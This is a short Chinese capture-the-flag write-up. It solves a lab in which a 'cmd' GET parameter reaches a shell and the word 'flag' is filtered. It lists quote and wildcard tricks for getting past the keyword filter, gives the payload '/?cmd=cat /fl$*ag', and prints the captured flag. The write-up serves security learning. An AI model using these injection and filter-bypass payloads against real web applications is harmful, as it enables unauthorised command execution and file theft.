开启靶场,打开链接:
GET传参cmd,且对flag字符串进行了过滤
用\*绕过,fl*ag
用'绕过,f''lag或f'l'ag
当然还有别的方法绕过,就不一一赘述了(已经写了文档了《过滤绕过方法》)
/?cmd=cat /fl$*ag
成功得到flag:
NSSCTF{132e1f48-9cc3-4a6f-8608-91f32a8fa6f6}
相关推荐
BingoGo14 小时前
当你的 PHP 应用的 API 没有限流时会发生什么?JaguarJack14 小时前
当你的 PHP 应用的 API 没有限流时会发生什么?BingoGo2 天前
OpenSwoole 26.2.0 发布:支持 PHP 8.5、io_uring 后端及协程调试改进JaguarJack2 天前
OpenSwoole 26.2.0 发布:支持 PHP 8.5、io_uring 后端及协程调试改进JaguarJack3 天前
推荐 PHP 属性(Attributes) 简洁读取 API 扩展包BingoGo3 天前
推荐 PHP 属性(Attributes) 简洁读取 API 扩展包JaguarJack4 天前
告别 Laravel 缓慢的 Blade!Livewire Blaze 来了,为你的 Laravel 性能提速郑州光合科技余经理4 天前
代码展示:PHP搭建海外版外卖系统源码解析一次旅行4 天前
网络安全总结QQ5110082854 天前
python+springboot+django/flask的校园资料分享系统